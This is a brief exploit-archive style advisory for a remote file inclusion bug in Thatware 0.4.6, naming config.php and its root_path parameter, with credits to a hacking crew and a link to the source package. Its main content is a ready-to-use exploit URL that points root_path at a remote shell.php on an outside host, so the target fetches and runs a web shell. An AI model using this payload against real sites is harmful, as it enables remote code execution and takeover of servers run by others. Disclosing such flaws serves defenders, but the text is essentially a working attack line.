Thatware 0.4.6 (root_path) Remote File Inclusion
CreW: ToXiC
Bug Found by Drago84
Source Code:
http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware_0.4.6.tar.gz
Page Affect
config.php
ExP:
http://www.sito.com/dir_thatware/config.php?root_path=http://www.evalsite.com/shell.php'
Greatz: str0ke